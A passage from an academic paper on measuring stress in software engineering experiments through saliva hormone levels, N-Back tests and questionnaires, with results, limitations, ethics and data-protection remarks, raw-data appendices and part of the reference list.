Con(trol) Group (Sample size = 11). Full-size DOI: 10.7717/peerj-cs.286/fig-5 Table 4 Pre and post-experiment task values for ESR factors, experiment group, study 2, sample size = 9. Anger Disgust Happiness Sadness Surprise Fear Stress ESR pre experiment group Mean 1.11 1.22 2.44 1.22 2.67 1.44 2.33 Standard deviation 0.33 0.44 0.53 0.67 1.32 0.53 0.71 Median 1.00 1.00 2.00 1.00 3.00 1.00 2.00 ESR post experiment group Mean 1.78 1.22 2.22 1.33 2.67 1.44 2.56 Standard deviation 1.09 0.67 1.2 0.71 1.32 0.73 1.01 Median 1 1 2 1 3 1 2 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 23/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-5 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ (correctness (mean increased by 1.5% points) and response time improvement (median decreased by about 125 ms) for experiment group vs. correctness decrease (mean by 1% point) for control group) but still is not statistically significant.The Wilcox test does not reveal a statistical relevance (p = 0.3217, α = 0.05). The slight reduction in response time and increase in correctness for both groups originates most likely from a learning effect. Performing the rmANOVA with time as within-subject factor and group as between- subjects factor showed a significant time effect (F(1,24) = 5.389, p = 0.029), no group effect (F(1,24) = 3.026, p = 0.095) but a significant time*group interaction (F(1,24) = 6.669, p = 0.016). Disentangling the significant time*group interaction revealed a significant Table 5 Pre and post-experiment task values for ESR factors, control group, study 2, sample size = 15. Anger Disgust Happiness Sadness Surprise Fear Stress ESR pre control group Mean 1.53 1.13 2.8 1.2 2.3 1.53 2.47 Standard deviation 0.64 0.35 0.94 0.56 0.98 1.06 0.99 Median 1 1 3 2 2 1 3 ESR post control group Mean 2.2 1.53 2.53 1.47 2.47 1.47 2.73 Standard deviation 0.94 10.6 0.74 0.74 1.19 0.64 0.96 Median 2 1 3 1 2 1 3 Figure 6 N-Back correctness for the Exp(eriment) Group (Sample size=9) and Con(trol) Group (Sample size=15). Full-size DOI: 10.7717/peerj-cs.286/fig-6 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 24/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-6 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ group difference before the intervention (pre: p = 0.022), with better performance in the control group. After the intervention (post), no significant group difference emerged (p = 0.625). While the experimental group did not show a change in performance (pre vs. post, p = 0.517), the control group showed a significant decrease (pre vs. post, p = 0.041). The median of the cortisol measurements (see Table 6) for the control group are slightly higher but the alphaamylase values are lower. However, this test shows no statistical significance (Willcoxon U for α = 0.05 for cortisol (C1 p = 0.35, C2 p = 0.4, C3 p = 0.68), Cliff’s delta for cortisol (C1:0.21, C2:0.19, C3:0.10), t-Test for α = 0.05 for alpha amylase Figure 7 N-Back reaction time for the Exp(eriment) Group (Sample size = 14) and Con(trol) Group (Sample size = 12). Full-size DOI: 10.7717/peerj-cs.286/fig-7 Table 6 Cortisol and alpha-amylase scores, Study 2. Experimental Control Experimental Control Experimental Control Offset cortisol (pg/ml) Peak cortisol (pg/ml) Final cortisol (pg/ml) Mean 6.13 7 4.55 5 3.83 4 Deviation 3.36 2.65 2.53 2.39 2.31 2.68 Median 5.7 6.85 3.44 4.33 2.85 2.95 Sample Size 15 14 15 14 15 14 Offset alphaamylase (U/l) Peak alphaamylase (U/l) Final alphaamylase (U/l) Mean 62.99 55 84.24 75 94.12 91 Deviation 16.51 13.11 13.22 25.37 23.42 23.5 Median 62.4 53.85 87.4 67.75 100.4 93 Sample Size 15 14 15 14 15 14 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 25/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-7 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ (A1 p = 0.14, A2 p = 0.25, A3 p = 0.07), Cliff’s delta for alpha amylase (A1:−0.31, A2:−0.31, A3:−0.15)). The raw data of the hormone levels can be found in the appendix in Tables A3 and A4. The rmANOVA with time and group revealed a significant time effect (F(2,54) = 21.451, p < 0.001), indicating a significant decrease from t1 to t3 (t1 vs. t2: p < 0.001; t2 vs. t3: p = 0.012; t1 vs. t3: p < 0.001), but no group effect (F(1,27) = 0.178, p = 0.676) nor group*time interaction (F(2,54) = 0.163, p = 0.810). Similar to the cortisol analysis, the rmANOVA for the Alphaamylase indicated a significant time effect (F(2,54) = 34.361, p < 0.001), demonstrating a significant increase from t1 to t3 (t1 vs. t2: p < 0.001, t2 vs. t3: p = 0.003; t1 vs. t3: p < 0.001), but no significant group effect (F(1,27) = 1.525, p = 0.227) nor a significant group*time interaction (F(2,54) = 0.262, p = 0.771). This means that the experiment group had a lower chemical stress reaction but a higher need for chemical energy. This might be an indicator that the experiment group reached an energy consuming coping strategy for the given problem sooner. The statistical power increases which indicates, that a larger group or a greater stress induction could show a more prominent effect. Still, the overall design proved to be feasible and changes made compared to the pilot have shortened the time needed to analyze the generated data. Limitations Based on lessons learned (and the useful suggestions of two anonymous reviewers), we summarize potential limitations that threat the validity of results, should our design be adopted. Unreported medical conditions Participants might refrain to reveal severe medical conditions, like Addison’s disease or Cushing’s syndrome, which influence the levels of hormones that are measured in our design, but we also believe that such issues have negligible impact on the results of studies from our design. First of all, conditions with severe impact on the measurements are rare, as, for example, Addison affects about 0.9 to 1.4 per 10,000 people in the developed world (Neto & De Carvalho, 2014) and Cushing’s syndrome is even rarer (Lindholm et al., 2001). Also, values arising from pathologically changed hormone values should be visible as outlier in the data. Stress induction The stress induced to participants has to be large enough to be significant and distinguishable from the (quite low) stress induced by the measurement instruments (N-Back, saliva samples and questionnaires). We have tried to balance stress induction vs. quality of measurement with our selected tools. Our collected data has shown that our stress induction effect has been too low. To plan the stress induction accordingly, we advise to take a closer look at the different way stress can be induced in psychological research (e.g., Kirschbaum (2015) as an example of socially induced stress or Kang & Fox (2000) as an example of cognitive stress induction). Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 26/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Learning effects of participants Some stress measurement tools (e.g., the N-Back test) base their results on memory and reaction time of the participants. To keep the effect of learning at a minimum the tests should be randomized to the best possible extent. In our case we used two different versions on the N-Back (see “Measurement Tools”). Reuse of the stress task under research If a task is being reused, participants might give away information about the task to other future participants. The information flow should be restricted if possible, as uncertainty is part of the stress generation (see “Definition of Stress”). While in our case the task was reused, our task consisted of several many subtasks with no clear correct answer: communication would not have done harm. It was also our design to keep participants uncertain about their performance on the task, as well as the task itself. LESSONS LEARNED In the following, we report on our experience and the lessons learned in more detail which we believe are valuable for future research attempts building upon our method. On effort and monetary costs The cost per combined measurement (cortisol and alphaamylase) and basic statistical analysis for one saliva sample was about 5 Euros (Swiss Health Care, 2017, http://swisshealthcare.de). This amounts to about 20 Euros per participant for the pilot and about 15 Euros per participant for the second study. Probably this cost can be reduced by arranging a high-volume contract with a laboratory or finding a cheaper provider of this service. Also, analysis of only cortisol reduces the cost per measurement by up to more than 50%. Sometimes, as in our case, university departments (e.g., medicine, biology, chemistry) already have a contract with a laboratory or might even be able to provide the analysis themselves. Compared to other equipment for stress measurement, our method lies in the mid section of overall costs. There are cheap heart rate monitors and skin conductance measurement tools but it depends again on the study and the aspects to be tested if they can be used effectively. Higher priced tools, like EEG (electroencephalography), can deliver other, maybe more precise results but the process is not easily applicable to large groups. Also, those tools need consumables, like electrodes, driving up the costs. Additionally, we need to keep in mind that with the cost for the hormone analysis equipment we are also covering a small part of the analysis of the results as well, as most labs deliver basic statistical calculations (mean, median, standard deviation,….) with the raw measurement data. The analysis of the results of other tools mentioned will require the help of medical trained personnel; for detailed results rather than just coarse indications, while with the data provided by the lab we can analyze effects with basic statistics. No process is worth the effort if it does not deliver results. Our case is somewhat inconclusive. We can identify times with higher and lower stress from our results of the Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 27/38 http://swisshealthcare.de http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ hormone levels. The additional information gathered (e.g., the N-Back results) backs up these results. However, we were not able to find a significant difference between the groups in our studies but we strongly suppose that this is due to other problems within these experiments (e.g., too small sample size due to data loss) or that the effect we were trying to observe was too small to be observed with this kind of design. In conclusion we believe that our proposed measurement process can enable non medical or psychological researchers to examine the influence of stress in processes. Our proposed measurements allow for a more detailed analysis, quick and easy applicable even in larger groups. However, our method can only deliver a first glance at stress-related problems. For an in-depth research on stress effects we strongly recommend to seek cooperation with medical or psychological stress scientists. Data protection We tried to gather as few personal data as possible but our proposed method will collect sensitive data beyond the usual demographic data of software engineering studies, that is, medical data. Besides adhering to the local laws on data protection, we believe that extra care should be taken when gathering, storing, and processing these data. Before the pilot, we had an extensive discussion with the data protection agency, a German federal agency in charge of enforcing and consulting on data protection laws. We decided to remove the personalization of the data points (pseudo-anonymised data). We talk about pseudo-anonymised data as the recent European data protection law especially has this term within its text in contrast to the old law which defined a term of “anonymised data”. Pseudo-anonymisation is reached when no relation can be easily established to the personal data (e.g., names, gender…) in contrast to full anonymisation, where the relation to personal data can be reestablished under no circumstance. In our case, we would only reestablish the connection to personal data if we were able to access to the data of all university students and, even then, only with a tiny probability. In other words, we cannot reestablish the connection. It is even more important to supply a written statement that explains what data will be gathered, for what purpose and the right to revoke the agreement and, also, the permission to use the gathered data at any time. With his or her signature, each participant should agree to these terms beforehand. This also shows the participants that their personal data will be handled securely and fairly. Effectiveness and ethics of stress induction techniques The issue of putting human participants under stress despite the potential health risks has to be addressed. We believe that the risk of permanent problems as a result of an experiment as described here is highly unlikely. The stress created is only temporary and is not more severe than day-to-day stress peaks. Still, it might be desirable to screen potential participants for preexisting issues which can amplify the negative effects of stress (e.g., a mental disorder). It is also necessary to fully inform the participants about the stress parts of the experiment beforehand if possible. Additionally, we advise to contact an ethics committee, if available, especially if drastic changes to the stress induction are made. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 28/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Still, to our experience a formal investigation by an ethics committee is not necessary for this kind of study. Additionally, we believe that there is a similarity with the issues in controlled experiments observing affect (moods, emotions). As summarized by Graziotin (2016), several studies have doubted the effectiveness of short mood-induction techniques for psychological experiments, where participants’ affect is manipulated through several techniques, for example, watching a sad movie, and effective long-term induction techniques might raise several ethical concerns, for example, as with the Facebook emotion contagion experiment (Shaw, 2016). Seeing how difficult it has been for us to manipulate stress when employing a robust methodology, we wonder whether the same mechanisms occur for stress induction technique, and if we should rather perform in situ studies. However, this reasoning is speculation at this point. Future studies should address the question of whether stress induction techniques are ineffective for controlled experiments. CONCLUSION In this work, we provided a brief introduction to stress theories and the effects of short-term and long-term exposure on mind and body. We explained how the world of software development is also saturated by stress-inducing events. We discussed how stress can be measured and proposed an efficient way to enable software engineering research to investigate the effects of stress on different processes including software engineering applications. We used our proposed measurement technique in two experiments rendering the approach as feasible and applicable to research on larger groups in software engineering. With this, we hope to enable and make the transfer of medical and psychological methods and knowledge to software engineering easier. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 29/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ APPENDIX Appendix of raw data Raw Data of Cortisol and Alpha-Amylase Scores Table A1 Results of the measurement of cortisol (picogramm per milliliter) in the gathered saliva samples of the first experiment. C(S1) (pg/ml) C(S2) (pg/ml) C(S3) (pg/ml) C(S4) (pg/ml) Cont. Exp. Cont. Exp. Cont. Exp. Cont. Exp. 3.86 2.73 4.79 3.18 3.06 3.28 3.22 5.39 11.4 9.82 8.22 9.72 7.57 6.77 5.86 6.32 6.2 7.47 5.49 4.71 8.3 3.64 9.71 0.319 7.08 5.21 8.7 4.82 5.81 10.7 5.34 6.6 8.67 4.74 12.6 8.5 12.5 0.508 5.42 13.6 9.4 4.15 6.15 4.24 5.1 5.49 4.49 3.33 9.79 3.52 8.71 13.8 7.27 15.6 0.847 6.41 6.06 14.9 7.66 12.4 7.4 11.4 2.58 2.02 14.8 13.8 16.7 8.74 24 8.08 4.12 2.41 17.8 3.08 12.7 4.23 10.8 2.32 2.79 9.22 2.93 3.78 4.74 1.44 4.46 6.13 9.95 3.59 7.32 2.65 1.78 1.87 5.85 3.82 1.77 – 7.79 1.68 16.5 0.726 4.59 11.2 4.2 – 10.3 7.04 7.08 3.93 4.43 5.77 0.797 – 2.22 0.349 2.91 0.432 2.96 5.63 6.42 – 6.52 5.73 4.68 5.72 3.86 – – – 3.64 13.5 5.58 7.25 5.3 – – – 4.62 – 0.579 – 0.499 – – – 8.26 – 6.19 – 11.4 – – – 8.09 – 17.7 – – – – – 0.584 – 0.46 – – – – – 0.585 – 0.66 – – – – – Median: 7.2 4.74 6.17 4.71 5.81 5.77 4.2 5.39 Average: 7.18 6.13 7.3 5.63 7.11 6.69 4.5 5.38 t-Test: p = 0.2919 p = 0.3134 p = 0.5417 p = 0.6098 Cliff's Delta −0.068 −0.076 −0.3 −0.564 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 30/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Table A2 Results of the measurement of alphaamylase (international unit per liter) in the gathered saliva samples. A(S1) (U/l) A(S2) (U/l) A(S3) (U/l) A(S4) (U/l) Cont. Exp. Cont. Exp. Cont. Exp. Cont. Exp. 16.47 17.92 50.24 22.08 86.67 18.11 61.39 16.43 23.54 17.51 97.27 15.75 13.14 17.89 27.81 172.56 18.14 18.46 31.67 188.33 48.07 13.61 13.84 13.55 29.55 98.08 216.33 13.35 17.89 85.85 17.97 320.17 113.03 114.94 16.32 72.8 15.29 105.69 149.19 45.89 18.76 167.67 13.48 309.29 13.53 263.35 182.35 134.5 102.16 14.71 17.49 13.6 17.78 14.72 14.36 17.19 14.09 20.8 110.31 19.58 161.42 16.4 19.88 18.76 15.94 50.49 84.76 13.49 15.29 71.71 16.59 17.65 21.07 18.11 185.61 23.14 215.78 16.59 29.12 – 16.59 25.34 45.62 17.4 19.61 – 16.59 – 333.76 23.44 268.52 54.3 19.9 – 44.8 – 38.12 16.59 62.74 14.79 63.56 – 20.39 – 16.59 16.59 16.59 22.16 16.59 – – – 13.79 – 165.22 – 29.42 – – – 16.59 – 18.03 – 18.3 – – – 203.55 – 14.13 – 13.09 – – – 22.16 – 182.35 – 19.88 – – – 16.59 – 195.4 – – – – – – – 16.59 – – – – – – – 20.39 – – – – – Median: 18.76 19.63 50.24 20.83 18.95 18 20.39 18.76 Average: 55.29 44.33 87.1 57.15 44.73 62.39 47.25 84.08 Wilcoxon U: p = 0.6366 p = 0.31325 p = 0.5417 p = 0.3597 Cliff's Delta −0.421 −0.177 −0.576 −0.608 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 31/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Table A3 Results of the measurement of cortisol (picogramm per milliliter) in the gathered saliva samples on the second experiment. C(S1) (pg/ml) C(S2) (pg/ml) C(S3) (pg/ml) Cont. Exp. Cont. Exp. Cont. Exp. 10.25 6.22 7.67 3.58 4.81 3.22 4.43 4.66 4.27 9.16 3.11 6.24 3.41 10.37 1.14 5.08 1.21 4.30 6.53 6.34 3.21 3.78 2.38 4.19 7.16 4.24 3.52 3.14 2.51 2.07 9.22 5.72 6.37 2.70 11.90 1.89 3.29 2.84 4.39 2.35 2.66 1.87 4.93 6.28 2.81 6.97 2.74 8.91 8.45 4.25 5.25 3.22 2.94 2.83 10.30 6.06 8.99 4.81 5.57 4.02 9.48 5.70 9.31 3.25 6.72 2.01 4.91 16.40 3.89 10.90 2.84 8.47 3.33 4.22 3.16 2.67 2.95 2.11 8.38 5.63 5.13 3.24 3.36 2.51 – 2.96 – 3.44 – 2.85 Average: 6.72 6.13 4.94 4.55 3.98 3.83 Median: 6.85 5.70 4.33 3.44 2.95 2.85 Wilcoxon U: p = 0.3536 p = 0.40 p = 0.683 Cliff's Delta: 0.2095 0.1905 0.0952 Table A4 Results of the measurement of alphaamylase (international unit per liter) in the gathered saliva samples for the second experiment. A(S1) (U/l) A(S2) (U/l) A(S3) (U/l) Cont. Exp. Cont. Exp. Cont. Exp. 47.1 60 54.8 89.3 85.4 90.6 46.2 78.1 50.9 55.7 88.8 62.6 65.6 53 136.3 87.4 139.4 84.2 67.7 61.7 82.5 92.5 99.1 85.8 53.3 77.3 90.2 84.9 97.2 101.3 35.6 41.1 102.66 98.4 49.55 104 76.4 84.19 59.15 89.8 110.31 129.9 55.8 66.3 92.4 64.9 98.8 34.9 40.09 49.7 65.8 92.7 93.1 105.25 38.8 63.5 43.5 78.8 51.3 87.1 49.9 42.99 52.1 96.1 72.2 100.4 76.6 35.02 90.4 69.1 111.8 83.11 57.9 88.1 62.8 104.5 92.9 117.6 54.4 81.5 69.7 80.8 77.7 114.3 – 62.40 – 78.7 – 110.80 Average: 54.67 62.99 75.23 84.24 90.54 94.12 Median: 53.85 62.4 67.75 87.4 93 100.4 t-Test: p = 0.1434 p = 0.2497 p = 0.0684 Cliff's Delta: −0.3143 −0.3143 −0.1524 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 32/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Questionnaires Socio-demographic questions PANAS and ESR (in German translation as used by Schneider et al. (1994)) Self-efficacy questions ACKNOWLEDGEMENTS We thank our participants for taking part in our study. We are grateful for the feedback provided by two anonymous reviewers and the editor. Our thanks to Katharina Plett for the professional proofreading of this article. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Stefan Wagner is an Academic Editor for PeerJ. Author Contributions � Jan-Peter Ostberg conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Daniel Graziotin analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Stefan Wagner analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Birgit Derntl conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: All the data is available in the Appendices. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.286#supplemental-information. REFERENCES Akula B, Cusick J. 2008. Impact of overtime and stress on software quality. In: 4th International Symposium on Management, Engineering, and Informatics (MEI 2008), Orlando, Florida, USA. Amin A, Basri S, Hassan MF, Rehman M. 2011. Software engineering occupational stress and knowledge sharing in the context of global software development. In: National Postgraduate Conference (NPC). IEEE, 1–4. Andreassi JL. 2013. Psychophysiology: human behavior & physiological response. East Sussex: Psychology Press. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 33/38 http://dx.doi.org/10.7717/peerj-cs.286#supplemental-information http://dx.doi.org/10.7717/peerj-cs.286#supplemental-information http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Bandura A. 1997. Self-efficacy: the exercise of control. New York: Macmillan Publishers. Behroozi M, Lui A, Moore I, Ford D, Parnin C. 2018. Dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. In: Proceedings of the 40th International Conference on Software Engineering: New Ideas and Emerging Results, ICSE-NIER ’18. New York: ACM, 93–96. Birbaumer N, Schmidt RF. 2010. Biologische psychologie. Seventh Edition. Berlin: Springer-Verlag. Boucsein W. 1991. Arbeitspsychologische beanspruchungsforschung heute—eine herausforderung an die psychophysiologie. Psychologische Rundschau 42(3):129–144. Boucsein W. 1993. Psychophysiology in the workplace—goals and methods. International Journal of Psychophysiology 14(2):115 DOI 10.1016/0167-8760(93)90128-C. Brown JA, Ivanov V, Rogers A, Succi G, Tormasov A, Yi J. 2018. Toward a better understanding of how to develop software under stress-drafting the lines for future research. Available at http://arxiv.org/abs/1804.09044. Cannon WB. 1929. Bodily changes in pain, hunger, fear and rage: an account of recent researches into the function of emotional excitement. JAMA 93(12):944. Chatterton RT, Vogelsong KM, Lu Y-C, Ellman AB, Hudgens GA. 1996. Salivary α-amylase as a measure of endogenous adrenergic activity. Clinical Physiology 16(4):433–448 DOI 10.1111/j.1475-097X.1996.tb00731.x. Chiappelli F, Iribarren FJ, Prolo P. 2006. Salivary biomarkers in psychobiological medicine. Bioinformation 1(8):331–334 DOI 10.6026/97320630001331. Chilton MA, Hardgrave BC, Armstrong DJ. 2010. Performance and strain levels of it workers engaged in rapidly changing environments: a person-job fit perspective. ACM SIGMIS Database: the DATABASE for Advances in Information Systems 41(1):8–35 DOI 10.1145/1719051.1719053. Cohen S. 1980. Aftereffects of stress on human performance and social behavior: a review of research and theory. Psychological Bulletin 88(1):82–108 DOI 10.1037/0033-2909.88.1.82. Cohen S, Janicki-Deverts D, Miller GE. 2007. Psychological stress and disease. JAMA 298(14):1685–1687 DOI 10.1001/jama.298.14.1685. Cohen S, Kamarck T, Mermelstein R. 1983. A global measure of perceived stress. Journal of Health and Social Behavior 24(4):385–396 DOI 10.2307/2136404. Cohen S, Kessler RC, Gordon LU. 1997. Measuring stress: a guide for health and social scientists. Oxford: Oxford University Press. Cruz S, Da Silva FQ, Capretz LF. 2015. Forty years of research on personality in software engineering: a mapping study. Computers in Human Behavior 46:94–113 DOI 10.1016/j.chb.2014.12.008. De Jonge BP, Jan B, Ybema JF, De Wolff CJ. 1998. Psychosocial aspects of occupational stress. Handbook of Work and Organizational Psychology: Work Psychology 2:145. Feldt R, Torkar R, Angelis L, Samuelsson M. 2008. Towards individualized software engineering. In: Cheng L-T, Sillito J, Storey M-A, Tessem B, Venolia G, De Souza C, Dittrich Y, John M, Hazzan O, Maurer F, Sharp H, Singer J, Sim SE, eds. Towards Individualized Software Engineering, Volume the 2008 International Workshop. New York: ACM Press, 49–52. Folkman S. 2008. The case for positive emotions in the stress process. Anxiety, Stress, and Coping 21(1):3–14 DOI 10.1080/10615800701740457. Fritz T, Begel A, Müller SC, Yigit-Elliott S, Züger M. 2014. Using psycho-physiological measures to assess task difficulty in software development. In: Proceedings of the 36th International Conference on Software Engineering. ACM, 402–413. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 34/38 http://dx.doi.org/10.1016/0167-8760(93)90128-C http://arxiv.org/abs/1804.09044 http://dx.doi.org/10.1111/j.1475-097X.1996.tb00731.x http://dx.doi.org/10.6026/97320630001331 http://dx.doi.org/10.1145/1719051.1719053 http://dx.doi.org/10.1037/0033-2909.88.1.82 http://dx.doi.org/10.1001/jama.298.14.1685 http://dx.doi.org/10.2307/2136404 http://dx.doi.org/10.1016/j.chb.2014.12.008 http://dx.doi.org/10.1080/10615800701740457 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Fujigaki Y, Asakura T, Haratani T. 1994. Work stress and depressive symptoms among Japanese information systems managers. Industrial Health 32(4):231–238 DOI 10.2486/indhealth.32.231. Gevins A, Cutillo B. 1993. Neuroelectric evidence for distributed processing in human working memory. Electroencephalography and Clinical Neurophysiology 87(3):128–143 DOI 10.1016/0013-4694(93)90119-G. Goldstein DS. 1995. Clinical assessment of sympathetic responses to stress. Annals of the New York Academy of Sciences 771(1):570–593 DOI 10.1111/j.1749-6632.1995.tb44711.x. Graziotin D. 2016. Towards a theory of affect and software developers’ performance. PhD thesis. Free University of Bozen-Bolzano, Italy. Graziotin D, Fagerholm F, Wang X, Abrahamsson P. 2017. On the unhappiness of software developers. In: Proceedings of the 21st International Conference on Evaluation and Assessment in Software Engineering (EASE’17). New York: ACM Press, 324–333. Graziotin D, Wang X, Abrahamsson P. 2015a. The affect of software developers: common misconceptions and measurements. In: 8th International Workshop on Cooperative and Human Aspects of Software Engineering (CHASE). IEEE/ACM, 123–124. Graziotin D, Wang X, Abrahamsson P. 2015b. Understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. In: Proceedings of the 7th International Workshop on Social Software Engineering. ACM, 25–32. Gren L. 2018. Standards of validity and the validity of standards in behavioral software engineering research. New York: ACM Press. Hellhammer DH, Wüst S, Kudielka BM. 2009. Salivary cortisol as a biomarker in stress research. Psychoneuroendocrinology 34(2):163–171 DOI 10.1016/j.psyneuen.2008.10.026. Hjortskov N, Rissén D, Blangsted AK, Fallentin N, Lundberg U, Søgaard K. 2004. The effect of mental stress on heart rate variability and blood pressure during computer work. European Journal of Applied Physiology 92(1–2):84–89 DOI 10.1007/s00421-004-1055-z. Hyman J, Baldry C, Scholarios D, Bunzel D. 2003. Work-life imbalance in call centres and software development. British Journal of Industrial Relations 41(2):215–239 DOI 10.1111/1467-8543.00270. Hyun J, Sliwinski MJ, Smyth JM. 2018. Waking up on the wrong side of the bed: the effects of stress anticipation on working memory in daily life. Journals of Gerontology 74(1):38–46 DOI 10.1093/geronb/gby042. Janke W, Erdmann G, Boucsein W. 1984. Der stressverarbeitungsfragebogen (svf). Göttingen: Hogrefe, 406. Jennett C, Cox AL, Cairns P, Dhoparee S, Epps A, Tijs T, Walton A. 2008. Measuring and defining the experience of immersion in games. International Journal of Human–Computer Studies 66(9):641–661 DOI 10.1016/j.ijhcs.2008.04.004. Jerusalem M, Schwarzer R. 1999. Skala zur allgemeinen selbstwirksamkeitserwartung. Skalen zur Erfassung von Lehrer-und Schülermerkmalen. In: Dokumentation der psychometrischen Verfahren im Rahmen der Wissenschaftlichen Begleitung des Modellversuchs Selbstwirksame Schulen. Berlin: Freie Universität. Kang D-H, Fox C. 2000. Neuroendocrine and leukocyte responses and pulmonary function to acute stressors. Annals of Behavioral Medicine 22(4):276–285 DOI 10.1007/BF02895663. Kanner AD, Coyne JC, Schaefer C, Lazarus RS. 1981. Comparison of two modes of stress measurement: daily hassles and uplifts versus major life events. Journal of Behavioral Medicine 4(1):1–39 DOI 10.1007/BF00844845. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 35/38 http://dx.doi.org/10.2486/indhealth.32.231 http://dx.doi.org/10.1016/0013-4694(93)90119-G http://dx.doi.org/10.1111/j.1749-6632.1995.tb44711.x http://dx.doi.org/10.1016/j.psyneuen.2008.10.026 http://dx.doi.org/10.1007/s00421-004-1055-z http://dx.doi.org/10.1111/1467-8543.00270 http://dx.doi.org/10.1093/geronb/gby042 http://dx.doi.org/10.1016/j.ijhcs.2008.04.004 http://dx.doi.org/10.1007/BF02895663 http://dx.doi.org/10.1007/BF00844845 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Kaufmann I, Pornschlegel H, Udris I. 1982. Arbeitsbelastung und beanspruchung. Humane Arbeit-Leitfaden für Arbeitnehmer 5:13–48. Khalfa S, Bella SD, Roy M, Peretz I, Lupien SJ. 2003. Effects of relaxing music on salivary cortisol level after psychological stress. Annals-New York Academy of Sciences 999:374–376. King MF, Bruner GC. 2000. Social desirability bias: a neglected aspect of validity testing. Psychology & Marketing 17(2):79–103 DOI 10.1002/(SICI)1520-6793(200002)17:2<79::AID-MAR2>3.0.CO;2-0. Kirschbaum C. 2015. Trier social stress test. Encyclopedia of Psychopharmacology 29:1755–1758. Kirschbaum C, Hellhammer DH. 1994. Salivary cortisol in psychoneuroendocrine research: recent developments and applications. Psychoneuroendocrinology 19(4):313–333 DOI 10.1016/0306-4530(94)90013-2. Kogler L, Seidel E-M, Metzler H, Thaler H, Boubela RN, Pruessner JC, Kryspin-Exner I, Gur RC, Windischberger C, Moser E, Habel U, Derntl B. 2017. Impact of self-esteem and sex on stress reactions. Scientific Reports 7(1):17210 DOI 10.1038/s41598-017-17485-w. Lademann J, Mertesacker H, Gebhardt B. 2006. Psychische Erkrankungen im Fokus der Gesundheitsreporte der Krankenkassen. Psychotherapeutenjournal 2(2006):123–139. Lazarus RS. 1966. Psychological stress and the coping process. New York: McGraw-Hill Education. Lazarus RS. 1990. Theory-based stress measurement. Psychological Inquiry 1(1):3–13 DOI 10.1207/s15327965pli0101_1. Lenberg P, Feldt R, Wallgren LG. 2015. Behavioral software engineering: a definition and systematic literature review. Journal of Systems and Software 107:15–37 DOI 10.1016/j.jss.2015.04.084. Lindholm J, Juul S, Jørgensen JOL, Astrup J, Bjerre P, Feldt-Rasmussen U, Hagen C, Jørgensen J, Kosteljanetz M, Kristensen L, Laurberg P, Schmidt K, Weeke J. 2001. Incidence and late prognosis of Cushing’s syndrome: a population-based study. Journal of Clinical Endocrinology & Metabolism 86(1):117–123. Lohmann-Haislah A. 2013. Psychische Anforderungen, Ressourcen und Befinden. Dortmund-Berlin-Dresden: Bundesanstalt für Arbeitsschutz und Arbeitsmedizin. Meier A, Kropp M, Anslow C, Biddle R. 2018. Stress in agile software development: practices and outcomes. Cham: Springer International Publishing, 259–266. Mueller ST, Piper BJ. 2014. The psychology experiment building language (pebl) and pebl test battery. Journal of Neuroscience Methods 222:250–259 DOI 10.1016/j.jneumeth.2013.10.024. Müller SC, Fritz T. 2016. Using (bio) metrics to predict code quality online. In: Proceedings of the 38th International Conference on Software Engineering. ACM, 452–463. Nater UM, Rohleder N, Gaab J, Berger S, Jud A, Kirschbaum C, Ehlert U. 2005. Human salivary alpha-amylase reactivity in a psychosocial stress paradigm. International Journal of Psychophysiology 55(3):333–342 DOI 10.1016/j.ijpsycho.2004.09.009. Neto RAB, De Carvalho JF. 2014. Diagnosis and classification of Addison’s disease (autoimmune adrenalitis). Autoimmunity Reviews 13(4–5):408–411 DOI 10.1016/j.autrev.2014.01.025. Noack H, Nolte L, Nieratschker V, Habel U, Derntl B. 2019. Imaging stress: an overview of stress induction methods in the MR scanner. Journal of Neural Transmission 126(9):1–16 DOI 10.1007/s00702-018-01965-y. Noto Y, Sato T, Kudo M, Kurata K, Hirota K. 2005. The relationship between salivary biomarkers and state-trait 